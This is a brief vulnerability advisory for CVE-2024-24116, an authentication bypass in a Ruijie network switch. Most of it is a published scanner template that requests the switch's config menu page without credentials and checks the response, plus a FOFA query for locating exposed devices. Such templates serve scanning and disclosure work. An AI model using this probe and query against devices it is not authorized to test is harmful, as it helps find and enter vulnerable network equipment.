CVE-2024-24116: Ruijie RG-NBS2009G-P - Improper Authentication

日期: 2025-08-01 | 影响软件: Ruijie RG-NBS2009G-P | POC: 已公开

漏洞描述

An issue in Ruijie RG-NBS2009G-P RGOS v.10.4(1)P2 Release(9736) allows a remote attacker to gain privileges via the system/config_menu.htm.

PoC代码[已公开]

id: CVE-2024-24116

info:
  name: Ruijie RG-NBS2009G-P - Improper Authentication
  author: friea
  severity: critical
  description: |
    An issue in Ruijie RG-NBS2009G-P RGOS v.10.4(1)P2 Release(9736) allows a remote attacker to gain privileges via the system/config_menu.htm.
  reference:
    - https://github.com/zty-1995/RG-NBS2009G-P-switch/tree/main/Unauthorized%20Access%20Vulnerability
    - https://gist.github.com/zty-1995/7a5e3ad0eb3b6c44db1a6eb4092893d3
    - https://nvd.nist.gov/vuln/detail/CVE-2024-24116
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-24116
    cwe-id: CWE-287
    epss-score: 0.8868
    epss-percentile: 0.9948
    cpe: cpe:2.3:o:ruijie:rg-nbs2009g-p_firmware:10.4\(1\)p2_release\(9736\):*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="ruijie.com.cn"
    vendor: ruijie
    product: rg-nbs2009g-p, rg-nbs2009g-p_firmware
  tags: ruijie,cve,cve2024,exposure,bac,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/system/config_menu.htm"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "configManage.asp"
          - "reinitIframe()"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202643b2eb5bb7f7281c4170efdc138cacd9cad4488008084fdc56b2104d301e14022100d4848948e9b759ad6dc978b9c5368662000cf28159525d4ba025813ecb460f16:922c64590222798bb761d5b6d8e72950

相关漏洞推荐